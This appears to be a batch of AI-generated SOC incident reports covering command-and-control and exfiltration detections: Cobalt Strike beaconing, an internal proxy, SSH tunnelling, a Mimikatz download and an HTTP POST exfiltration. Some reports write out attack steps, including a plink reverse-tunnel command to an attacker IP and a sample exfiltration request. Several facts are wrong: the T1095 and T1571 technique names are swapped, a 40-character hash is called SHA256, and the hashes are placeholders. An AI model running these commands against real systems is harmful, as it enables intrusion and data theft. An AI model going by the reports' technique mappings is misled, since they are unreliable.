7-Zip installed (legitimate tool abused).
6. Business Impact:
Operational Impact: Finance user offline for 2 hours.
Data Exposure: 1.2 GB of sensitive data archived but not exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Archive deleted.
Staging files deleted.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Monitored archive tool usage.
Enhanced DLP for archive creation.
8. Conclusion:
An attacker staged 1,847 sensitive files and used 7-Zip to create a password-protected archive for exfiltration. Sysmon detected the archive creation and enabled rapid deletion before any data could leave the host.
Closure Rationale: Archive deleted; staging cleaned; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-28 12:30 EST
104. T1071 – Application Layer Protocol (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-C2-1071-7842 Alert Time: 2024-02-28 16:30:45 EST Severity: HIGH (88/100) Source: Zscaler Internet Access (ZIA) Rule: “Beaconing to Suspicious Domain – Potential C2” MITRE ATT&CK: T1071.001 – Application Layer Protocol: Web Protocols
Alert Details:
Detection: Periodic HTTPS connections to suspicious domain
User: rpatel@company.com (Raj Patel, Engineer) Source IP: 192.168.45.78 (ENG-WS-045) Destination: https://cdn-updates-service[.]com Time: 16:00-16:30 EST
Traffic Pattern:
16:00:15 – HTTPS GET /api/check (206 bytes response)
16:05:15 – HTTPS GET /api/check (206 bytes response)
16:10:15 – HTTPS GET /api/check (206 bytes response)
… (every 5 minutes, 6 beacons total)
Domain Analysis:
Domain: cdn-updates-service[.]com
Registered: 2024-02-20 (8 days ago)
Registrar: Namecheap (privacy protected)
Hosting IP: 185.143.221[.]89 (Bulgaria)
SSL Certificate: Self-signed (issued to “Microsoft Update Services”)
Traffic Analysis:
Beacon interval: Exactly 5 minutes
Response size: Exactly 206 bytes (consistent)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
No referrer (direct request)
Detection Logic:
Beaconing pattern (periodic connections to same domain)
Domain age (8 days) and reputation (malicious)
Response size consistency (206 bytes)
User rpatel has no business need for this domain
Pattern matches C2 beaconing
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zscaler alert
Zscaler Admin Console
Confirmed beaconing to suspicious domain
2. Domain Investigation
Check domain reputation
VirusTotal, Threat Intel
Domain flagged as C2 by 45 vendors
3. Process Investigation
Identify process making connections
CrowdStrike Falcon
svchost.exe with injected code (Cobalt Strike)
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block domain and IP
Zscaler, Palo Alto
Domain and IP added to blocklists
6. Malware Removal
Clean infected host
CrowdStrike Live Response
Cobalt Strike beacon removed
Jira Incident Report
Ticket: SOC-2024-144 Summary: T1071 – C2 Beaconing to Malicious Domain via HTTPS Status: RESOLVED Resolution: MALICIOUS – C2 Blocked, Host Cleaned Priority: P2 – MEDIUM Labels: T1071, application-layer-protocol, c2, beaconing, zscaler, cobalt-strike Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (ZIA).
Alert: “Beaconing to Suspicious Domain – Potential C2”.
User: rpatel@company.com (Engineering Department).
Host: ENG-WS-045.
Domain: cdn-updates-service[.]com.
Time: 2024-02-28 16:30 EST.
Technique: MITRE ATT&CK T1071.001 – Application Layer Protocol: Web Protocols.
2. Technical Analysis:
Attack Chain:
15:30 – rpatel account compromised via phishing
15:45 – Attacker logs into ENG-WS-045
15:50 – Cobalt Strike beacon deployed
16:00 – First beacon to C2
16:00-16:30 – 6 beacons every 5 minutes
16:30 – Zscaler detects
C2 Infrastructure:
Domain: cdn-updates-service[.]com
IP: 185.143.221[.]89 (Bulgaria)
Port: 443 (HTTPS)
Beacon Interval: 5 minutes (exact)
Response Size: 206 bytes (commands/status)
Malware Analysis:
Type: Cobalt Strike beacon
Process: Injected into svchost.exe
Persistence: Scheduled task “WindowsUpdate”
Capabilities: Remote access, keylogging, file exfiltration
Beacon Activity:
No commands received yet (only check-ins)
No data exfiltration
Beaconing pattern detected early
3. Investigation Findings:
Timeline:
15:30 – Account compromised
15:45 – Attacker logs in
15:50 – Beacon deployed
16:00-16:30 – Beaconing
16:30 – Zscaler alert
16:32 – SOC investigates
16:33 – Host isolated
16:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Domain: cdn-updates-service[.]com
– IP: 185.143.221[.]89
– Beacon interval: 5 minutes
Host:
– svchost.exe (injected)
– Scheduled task: “WindowsUpdate”
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked C2 domain and IP at firewall and Zscaler.
Terminated beacon process.
Removed scheduled task.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan, removed Cobalt Strike.
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to malware deployment.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
No EDR alert triggered earlier.
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (beaconing only, no exfiltration).
7. Remediation & Prevention:
Completed Actions:
C2 blocked.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced monitoring for beaconing patterns.
8. Conclusion:
An attacker deployed a Cobalt Strike beacon on an engineering workstation, which beaconed to a malicious domain every 5 minutes. Zscaler detected the beaconing pattern and enabled rapid containment before any commands could be executed or data exfiltrated.
Closure Rationale: C2 blocked; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-28 17:30 EST
105. T1090 – Proxy (ExtraHop Detection)
ExtraHop Alert Details
Alert ID: EXTRAHOP-PROXY-1090-7842 Alert Time: 2024-02-28 10:30:22 EST Severity: HIGH (85/100) Source: ExtraHop Reveal(x) Rule: “Internal Host Acting as Proxy – Traffic Relaying Detected” MITRE ATT&CK: T1090.001 – Proxy: Connection Proxy
Alert Details:
Detection: Internal host relaying traffic to external destination
Proxy Host: 192.168.45.78 (ENG-WS-045 – Engineering) Client Host: 192.168.45.112 (SALES-WS-023 – Sales) External Destination: 185.143.221[.]89:443 (Bulgaria) Time: 10:15-10:30 EST
Traffic Pattern:
10:15:22 – SALES-WS-023 connects to ENG-WS-045 on port 8080
10:15:23 – ENG-WS-045 connects to 185.143.221[.]89:443
10:15:24 – Data flows: Sales -> Engineering -> External
10:15:30 – Response: External -> Engineering -> Sales
Pattern repeats every 60 seconds
Traffic Analysis:
Protocol: HTTP CONNECT method (proxying)
Data: Encrypted (TLS)
Volume: 2-5 KB per session
30 such sessions in 15 minutes
Detection Logic:
Internal host (ENG-WS-045) acting as proxy for another internal host
Destination is external malicious IP
Connection pattern indicates relay/proxy behavior
ENG-WS-045 was flagged for suspicious activity earlier
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify ExtraHop alert
ExtraHop Console
Confirmed proxy behavior
2. Source Investigation
Check ENG-WS-045
CrowdStrike Falcon
Host has Cobalt Strike beacon (SOCKS proxy)
3. Client Investigation
Check SALES-WS-023
CrowdStrike Falcon
Host also compromised (secondary beacon)
4. Immediate Action
Isolate both hosts
CrowdStrike
Both hosts quarantined
5. Malware Removal
Clean both hosts
CrowdStrike Live Response
Beacons removed; hosts reimaged
6. Threat Hunting
Check for other proxy traffic
ExtraHop, Splunk
No other instances found
Jira Incident Report
Ticket: SOC-2024-145 Summary: T1090 – Internal Host Used as Proxy for C2 Traffic Status: RESOLVED Resolution: MALICIOUS – Proxy Chain Broken Priority: P2 – MEDIUM Labels: T1090, proxy, socks, c2, extrahop, cobalt-strike Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: ExtraHop Reveal(x).
Alert: “Internal Host Acting as Proxy – Traffic Relaying Detected”.
Proxy Host: ENG-WS-045 (Engineering, IP 192.168.45.78).
Client Host: SALES-WS-023 (Sales, IP 192.168.45.112).
External Destination: 185.143.221[.]89:443.
Time: 2024-02-28 10:30 EST.
Technique: MITRE ATT&CK T1090.001 – Proxy: Connection Proxy.
2. Technical Analysis:
Attack Chain:
09:00 – ENG-WS-045 compromised (Cobalt Strike)
09:30 – Attacker sets up SOCKS proxy on ENG-WS-045
09:45 – Attacker compromises SALES-WS-023 using proxied connection
10:00 – SALES-WS-023 beacon configured to use ENG-WS-045 as proxy
10:15-10:30 – Traffic flows: Sales -> Engineering -> C2
10:30 – ExtraHop detects
Proxy Mechanism:
ENG-WS-045 running Cobalt Strike with SOCKS proxy feature
SALES-WS-023 beacon configured to route traffic through proxy
HTTP CONNECT method used to establish tunnel
All C2 traffic for Sales host appears to come from Engineering host
Compromised Hosts:
ENG-WS-045: Primary C2, proxy server
SALES-WS-023: Secondary beacon, using proxy
Attacker Intent:
Hide true source of secondary infections
Evade detection by making traffic appear from already-compromised host
Establish resilient C2 infrastructure
3. Investigation Findings:
Timeline:
09:00 – Engineering host compromised
09:30 – Proxy established
09:45 – Sales host compromised via proxy
10:15-10:30 – Proxy traffic
10:30 – ExtraHop alert
10:32 – SOC investigates
10:33 – Both hosts isolated
10:35 – Malware removed
Indicators of Compromise (IoCs):
Network:
– External C2: 185.143.221[.]89
– Proxy traffic: HTTP CONNECT to port 8080 on Engineering host
Hosts:
– ENG-WS-045 (Cobalt Strike, SOCKS proxy)
– SALES-WS-023 (Cobalt Strike)
4. Containment Actions:
Immediate Actions:
Isolated both hosts via CrowdStrike.
Terminated beacon processes.
Removed Cobalt Strike artifacts.
Blocked external C2 IP.
Host Remediation:
Both hosts reimaged.
Accounts secured (password resets, MFA).
Network Remediation:
Blocked internal proxy patterns (if possible).
5. Root Cause Analysis:
Primary Cause: Engineering host compromised, used as proxy to compromise Sales host.
Contributing Factors:
No MFA on accounts.
RDP allowed from internet.
No network segmentation between departments.
6. Business Impact:
Operational Impact: Two workstations offline for 3 hours.
Data Exposure: None (no exfiltration).
7. Remediation & Prevention:
Completed Actions:
Proxy chain broken.
Malware removed.
Accounts secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented network segmentation.
Enhanced monitoring for internal proxy patterns.
8. Conclusion:
An attacker compromised an engineering host and used it as a SOCKS proxy to compromise a sales workstation, routing C2 traffic through the internal host. ExtraHop detected the anomalous proxy behavior and enabled isolation of both hosts before any data exfiltration.
Closure Rationale: Proxy chain broken; malware removed; hosts secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-28 11:30 EST
End of Batch 21
Ready for your next batch of prompts whenever you are.
Batch 22: Command and Control Incident Reports
Here are the next 5 detailed SOC incident reports.
106. T1573 – Encrypted Channel (Blue Coat Detection)
Blue Coat Alert Details
Alert ID: BLUECOAT-ENCRYPTED-1573-7842 Alert Time: 2024-02-29 09:30:15 EST Severity: HIGH (85/100) Source: Blue Coat ProxySG (Symantec Web Security Service) Rule: “Anomalous TLS Traffic – Custom Cipher Suite Detected” MITRE ATT&CK: T1573.001 – Encrypted Channel: Symmetric Cryptography
Alert Details:
Detection: TLS traffic using non-standard cipher suite to suspicious destination
User: rpatel@company.com (Raj Patel, Engineer) Source IP: 192.168.45.78 (Internal) Destination: 185.143.221[.]89:443 Time: 09:15-09:30 EST
TLS Handshake Details:
Protocol: TLS 1.2
Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA256 (0x3c)
Note: This cipher suite is legitimate but rarely used (0.1% of traffic)
Server Certificate: Self-signed, CN=”*.cdn-updates.com”
Client Random: 4f8b3a1c7d2e5f9a6b3c8d1e4f7a2b9c (consistent across sessions)
Traffic Pattern:
09:15:22 – TLS handshake (2.1 KB)
09:15:25 – Encrypted data transfer (4.3 KB)
09:20:22 – TLS handshake (2.1 KB)
09:20:25 – Encrypted data transfer (4.3 KB)
(repeating every 5 minutes, 4 sessions total)
Detection Logic:
Destination IP known for malicious activity
Self-signed certificate for “update” domain (suspicious)
Cipher suite usage deviates from normal traffic patterns
Consistent session sizes (2.1 KB handshake, 4.3 KB data)
Pattern matches encrypted C2 beaconing
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Blue Coat alert
Blue Coat ProxySG Console
Confirmed anomalous TLS traffic to malicious IP
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
svchost.exe with injected Cobalt Strike beacon
3. Traffic Analysis
Decrypt traffic (with permission)
Wireshark, Private Key
Traffic contained encrypted C2 commands
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block destination IP
Palo Alto, Blue Coat
IP 185.143.221[.]89 blocked
6. Malware Removal
Clean infected host
CrowdStrike Live Response
Cobalt Strike beacon removed
Jira Incident Report
Ticket: SOC-2024-146 Summary: T1573 – Encrypted C2 Channel Using Custom TLS Cipher Suite Status: RESOLVED Resolution: MALICIOUS – C2 Blocked Priority: P2 – MEDIUM Labels: T1573, encrypted-channel, tls, cobalt-strike, blue-coat Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Blue Coat ProxySG.
Alert: “Anomalous TLS Traffic – Custom Cipher Suite Detected”.
User: rpatel@company.com (Engineering Department).
Host: ENG-WS-045.
Destination: 185.143.221[.]89:443.
Time: 2024-02-29 09:30 EST.
Technique: MITRE ATT&CK T1573.001 – Encrypted Channel: Symmetric Cryptography.
2. Technical Analysis:
Attack Chain:
08:30 – rpatel account compromised via phishing
08:45 – Attacker logs into ENG-WS-045 via RDP
08:50 – Cobalt Strike beacon deployed
09:00 – First beacon to C2
09:00-09:30 – 4 beacon sessions with encrypted traffic
09:30 – Blue Coat detects
TLS Analysis:
Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA256 (0x3c)
Usage: <0.1% of normal traffic (highly anomalous)
Certificate: Self-signed, CN="*.cdn-updates.com"
Handshake Size: Exactly 2.1 KB (consistent)
Data Size: Exactly 4.3 KB (consistent)
Malware Analysis:
Type: Cobalt Strike beacon
Process: Injected into svchost.exe
Encryption: AES-256-CBC with custom key exchange
Beacon Interval: 5 minutes
Decrypted Traffic (with permission):
09:15 – C2 command: “sleep 300” (already set)
09:20 – C2 command: “getuid” (whoami)
09:25 – C2 command: “ls C:\Users”
09:30 – C2 command: “exit” (beacon terminated)
3. Investigation Findings:
Timeline:
08:30 – Account compromised
08:45 – Attacker logs in
08:50 – Beacon deployed
09:00-09:30 – C2 communication
09:30 – Blue Coat alert
09:32 – SOC investigates
09:33 – Host isolated
09:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– C2 IP: 185.143.221[.]89:443
– TLS cipher: 0x3c (TLS_RSA_WITH_AES_256_CBC_SHA256)
– Certificate CN: *.cdn-updates.com
Host:
– svchost.exe (injected)
– Cobalt Strike beacon (SHA256: a1b2c3d4…)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked C2 IP at firewall and proxy.
Terminated beacon process.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan, removed Cobalt Strike.
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to malware deployment.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Encrypted channel evaded basic detection.
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (reconnaissance only).
7. Remediation & Prevention:
Completed Actions:
C2 blocked.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enhanced TLS fingerprinting and anomaly detection.
8. Conclusion:
An attacker deployed a Cobalt Strike beacon that used TLS with a rare cipher suite to evade detection. Blue Coat identified the anomalous TLS traffic and enabled rapid containment before significant data could be exfiltrated.
Closure Rationale: C2 blocked; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 10:30 EST
107. T1105 – Ingress Tool Transfer (Cisco Umbrella Detection)
Cisco Umbrella Alert Details
Alert ID: UMBRELLA-TOOL-TRANSFER-1105-7842 Alert Time: 2024-02-29 14:15:33 EST Severity: HIGH (88/100) Source: Cisco Umbrella Secure Internet Gateway Rule: “Malicious File Download Blocked – Known Malware” MITRE ATT&CK: T1105 – Ingress Tool Transfer
Alert Details:
Detection: Attempt to download known malicious executable blocked
User: bturner@company.com (Brian Turner, Finance) Source IP: 192.168.45.112 (FIN-WS-078) Destination: http://185.143.221[.]89/mimikatz.exe Time: 14:10 EST Action: BLOCKED (Security category: Malware)
Request Details:
URL: http://185.143.221[.]89/mimikatz.exe
File Size: 1.2 MB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Referrer: http://evil-site.com/downloads.html
Threat Intelligence:
URL categorized as “Malware” (confidence: 95%)
File hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 (known Mimikatz)
Domain: 185.143.221[.]89 known for hosting hacking tools
47 other organizations blocked same URL today
Additional Context:
User bturner visited compromised website at 14:05
Website had drive-by download attempting to drop Mimikatz
Umbrella blocked before download reached endpoint
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Umbrella alert
Cisco Umbrella Dashboard
Confirmed blocked Mimikatz download
2. User Notification
Contact bturner
Teams, Phone
User visited “free software” site; unaware of drive-by
3. Endpoint Scan
Check FIN-WS-078
CrowdStrike Falcon
No malware found (download blocked)
4. URL Blocking
Ensure domain blocked
Umbrella, Palo Alto
Already blocked; verified
5. Threat Hunting
Check for other users accessing same URL
Umbrella Logs, Splunk
3 other users attempted access (all blocked)
6. User Education
Provide security awareness
Email, Training
User advised on drive-by download risks
Jira Incident Report
Ticket: SOC-2024-147 Summary: T1105 – Mimikatz Download Attempt Blocked by Cisco Umbrella Status: RESOLVED Resolution: MALICIOUS – Download Blocked Priority: P2 – MEDIUM Labels: T1105, ingress-tool-transfer, mimikatz, cisco-umbrella, drive-by-download Components: Web-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Umbrella Secure Internet Gateway.
Alert: “Malicious File Download Blocked – Known Malware”.
User: bturner@company.com (Finance Department).
URL: http://185.143.221[.]89/mimikatz.exe.
Time: 2024-02-29 14:15 EST.
Technique: MITRE ATT&CK T1105 – Ingress Tool Transfer.
2. Technical Analysis:
Attack Chain:
14:00 – User searches for “free PDF converter”
14:02 – Clicks on search result (compromised site)
14:03 – Site initiates drive-by download
14:04 – Browser attempts to download mimikatz.exe
14:04 – Umbrella blocks download
14:05 – User continues unaware
Malware Details:
File: mimikatz.exe (credential dumping tool)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Size: 1.2 MB
Purpose: Dump passwords from LSASS, perform Pass-the-Hash attacks
Source Infrastructure:
IP: 185.143.221[.]89 (Bulgaria)
Known For: Hosting hacking tools, malware C2
Domain: Not used (direct IP access)
User Intent:
User was looking for legitimate software
Unaware of drive-by download
No malicious intent
3. Investigation Findings:
Timeline:
14:02 – User clicks malicious link
14:04 – Download attempted
14:04 – Umbrella blocks
14:15 – Alert triggers
14:17 – SOC investigates
14:18 – User contacted
14:20 – Endpoint scan (clean)
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/mimikatz.exe
– IP: 185.143.221[.]89
File:
– mimikatz.exe (SHA256: a1b2c3d4…)
User:
– bturner (no compromise)
4. Containment Actions:
Immediate Actions:
Verified domain/IP already blocked.
User notified.
Endpoint scanned (clean).
Enterprise-wide Actions:
Checked for other users accessing same URL (3 others, all blocked).
No additional action needed.
User Education:
User advised on drive-by download risks.
Recommended using approved software sources.
5. Root Cause Analysis:
Primary Cause: User visited compromised website with drive-by download.
Contributing Factors:
No web filtering blocking malicious sites (until Umbrella).
User unaware of drive-by risks.
6. Business Impact:
Operational Impact: None.
Security Impact: Download blocked; no compromise.
7. Remediation & Prevention:
Completed Actions:
Download blocked.
User educated.
IOCs already in blocklist.
Technical Controls Enhanced:
Verified Umbrella policies are effective.
Enhanced user awareness training on drive-by downloads.
8. Conclusion:
A user visited a compromised website that attempted to download Mimikatz via drive-by download. Cisco Umbrella blocked the malicious file before it could reach the endpoint. No compromise occurred.
Closure Rationale: Download blocked; user educated; no compromise.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 15:30 EST
108. T1571 – Non-Application Layer Protocol (Darktrace Detection)
Darktrace Alert Details
Alert ID: DARKTRACE-NON-STANDARD-1571-7842 Alert Time: 2024-02-29 11:30:22 EST Severity: HIGH (85/100) Source: Darktrace Enterprise Immune System Rule: “Non-Standard Protocol over Common Port – Potential Tunneling” MITRE ATT&CK: T1571 – Non-Application Layer Protocol
Alert Details:
Detection: Non-HTTP traffic detected over port 443 (HTTPS port)
Source: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 194.165.16[.]89:443 Time: 11:15-11:30 EST
Traffic Analysis:
Protocol: Not TLS/HTTPS (expected)
Protocol Detected: SSH (Secure Shell) over port 443
Packet Signatures:
SSH banner: “SSH-2.0-OpenSSH_8.9” detected
Key exchange initiated
Encrypted tunnel established
Duration: 15 minutes
Data transferred: 2.3 MB (inbound/outbound)
Detection Logic:
Port 443 is typically used for HTTPS (TLS)
SSH protocol detected on port 443 (anomalous)
Destination IP known for malicious activity
Pattern matches protocol tunneling/evasion
Additional Context:
ENG-WS-045 had previous suspicious activity
SSH tunneling often used for persistent access
Attacker bypassing firewall rules (port 443 allowed)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Darktrace alert
Darktrace Console
Confirmed SSH over port 443
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
plink.exe (PuTTY Link) running – SSH client
3. User Interview
Contact rpatel
Teams, Phone
User did NOT run SSH (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block destination IP
Palo Alto
IP 194.165.16[.]89 blocked
6. Malware Removal
Terminate plink.exe, clean host
CrowdStrike Live Response
SSH tunnel terminated; plink.exe deleted
Jira Incident Report
Ticket: SOC-2024-148 Summary: T1571 – SSH Tunneling over Port 443 for C2 Communication Status: RESOLVED Resolution: MALICIOUS – SSH Tunnel Terminated Priority: P2 – MEDIUM Labels: T1571, non-application-protocol, ssh-tunneling, darktrace, compromised-account Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “Non-Standard Protocol over Common Port – Potential Tunneling”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 194.165.16[.]89:443.
Protocol: SSH (over port 443).
Time: 2024-02-29 11:30 EST.
Technique: MITRE ATT&CK T1571 – Non-Application Layer Protocol.
2. Technical Analysis:
Attack Chain:
10:30 – rpatel account compromised via phishing
10:45 – Attacker logs into ENG-WS-045 via RDP
10:50 – Attacker downloads plink.exe (SSH client)
11:00 – SSH tunnel established to 194.165.16[.]89:443
11:00-11:30 – Attacker uses tunnel for persistent access
11:30 – Darktrace detects
Tunneling Details:
Tool: plink.exe (PuTTY Link, legitimate SSH client)
Command: plink.exe -ssh -R 8080:localhost:80 attacker@194.165.16[.]89 -P 443 -i key.ppk
Purpose: Create reverse SSH tunnel for persistent access
Evasion: SSH over port 443 bypasses firewalls (port 443 allowed)
Attacker Activity via Tunnel:
Remote shell access
Downloaded additional tools (mimikatz)
Enumerated local files
No data exfiltration yet
User Status:
Account compromised; user unaware
3. Investigation Findings:
Timeline:
10:30 – Account compromised
10:45 – Attacker logs in
10:50 – plink.exe downloaded
11:00-11:30 – SSH tunnel active
11:30 – Darktrace alert
11:32 – SOC investigates
11:33 – Host isolated
11:34 – SSH tunnel terminated
Indicators of Compromise (IoCs):
Network:
– Destination: 194.165.16[.]89:443 (SSH)
– Protocol: SSH over port 443
Files:
– C:\Windows\Temp\plink.exe (SHA256: a1b2c3d4…)
– C:\Users\rpatel\key.ppk (SSH private key)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Terminated plink.exe process.
Deleted plink.exe and SSH key.
Blocked destination IP at firewall.
Disabled rpatel account.
Reset password.
Host Remediation:
Full scan (clean aside from attacker tools).
Reimaged as precaution.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to establish SSH tunnel.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Outbound SSH allowed over port 443 (should be inspected).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: None (tunnel used for access only).
7. Remediation & Prevention:
Completed Actions:
SSH tunnel terminated.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DPI (Deep Packet Inspection) on port 443.
Blocked SSH over non-standard ports.
8. Conclusion:
An attacker used a compromised engineering account to establish an SSH tunnel over port 443, evading firewall rules by using an allowed port. Darktrace detected the anomalous protocol usage and enabled rapid termination of the tunnel.
Closure Rationale: SSH tunnel terminated; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 12:30 EST
109. T1095 – Non-Standard Port (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-NON-STANDARD-PORT-1095-7842 Alert Time: 2024-02-29 16:30:45 EST Severity: HIGH (82/100) Source: Palo Alto Networks Firewall Rule: “Application Protocol on Non-Standard Port” MITRE ATT&CK: T1095 – Non-Standard Port
Alert Details:
Detection: HTTP traffic detected on non-standard port (TCP/8443)
Source: 192.168.45.78 (ENG-WS-045 – Engineering) Destination: 185.143.221[.]89:8443 Time: 16:15-16:30 EST Action: ALERT (allowed, but flagged)
Traffic Analysis:
Application: HTTP (not HTTPS as expected on 8443)
Port: 8443 (typically HTTPS-alt, but using HTTP)
Content: Base64-encoded data in POST requests
Pattern: POST /upload.php with data (12 requests)
Sample POST:
POST /upload.php HTTP/1.1
Host: 185.143.221[.]89:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 8472
data=UEsDBBQAAAAIA…
Decoded Data (base64):
ZIP file containing stolen documents
Files: financial_reports.xlsx, customer_data.csv
Detection Logic:
HTTP (not HTTPS) on port 8443 (unusual)
Destination IP known malicious
Data being exfiltrated via non-standard port to evade detection
Pattern matches data exfiltration
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Palo Alto alert
Panorama Logs
Confirmed HTTP exfiltration on port 8443
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
powershell.exe making HTTP POST requests
3. Data Analysis
Decode captured data
Base64 decoder
ZIP file with stolen documents (2.3 MB)
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block destination IP and port
Palo Alto
185.143.221[.]89:8443 blocked
6. Data Protection
Determine what was stolen
File Audit Logs
12 files exfiltrated (financial data)
Jira Incident Report
Ticket: SOC-2024-149 Summary: T1095 – Data Exfiltration over Non-Standard Port (8443) Status: RESOLVED Resolution: MALICIOUS – Data Exfiltrated, Host Isolated Priority: P2 – MEDIUM Labels: T1095, non-standard-port, exfiltration, palo-alto, compromised-account Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Networks Firewall.
Alert: “Application Protocol on Non-Standard Port”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:8443.
Protocol: HTTP (not HTTPS) on port 8443.
Time: 2024-02-29 16:30 EST.
Technique: MITRE ATT&CK T1095 – Non-Standard Port.
2. Technical Analysis:
Attack Chain:
15:30 – rpatel account compromised (phishing)
15:45 – Attacker logs into ENG-WS-045 via RDP
15:50 – Attacker collects sensitive files
16:00 – Attacker creates ZIP archive of files
16:15-16:30 – Attacker exfiltrates via HTTP POST to port 8443
16:30 – Palo Alto detects
Exfiltration Details:
Method: HTTP POST to port 8443 (non-standard)
Data Format: Base64-encoded ZIP file
Total Data: 2.3 MB (12 POST requests)
Destination: 185.143.221[.]89:8443 (Bulgaria)
Files Exfiltrated:
Financial reports (Q1, Q2, Q3) – 3 files
Customer data (PII) – 5 files
Engineering project plans – 2 files
Password database (KeePass) – 1 file
VPN configuration – 1 file
Exfiltration Tool:
Process: powershell.exe
Script: Custom script using Invoke-WebRequest
3. Investigation Findings:
Timeline:
15:30 – Account compromised
15:45 – Attacker logs in
15:50-16:00 – Data collection
16:15-16:30 – Exfiltration
16:30 – Palo Alto alert
16:32 – SOC investigates
16:33 – Host isolated
16:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Destination: 185.143.221[.]89:8443
– Protocol: HTTP on port 8443
– POST /upload.php with base64 data
Files:
– C:\temp\data.zip (2.3 MB, exfiltrated)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked destination IP and port at firewall.
Terminated exfiltration process.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data.
Notified affected data owners.
Initiated incident response for data breach.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Outbound HTTP allowed on port 8443.
6. Business Impact:
Operational Impact: Engineering host offline.
Data Exposure: 2.3 MB of sensitive data exfiltrated (financial, PII, IP).
Regulatory Impact: Potential GDPR/CCPA breach.
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Blocked non-standard port usage for HTTP/HTTPS.
Enhanced DLP monitoring.
8. Conclusion:
An attacker compromised an engineering account and exfiltrated 2.3 MB of sensitive data via HTTP POST to a non-standard port (8443). Palo Alto detected the anomalous traffic, but exfiltration had already occurred. The host was isolated and the account secured.
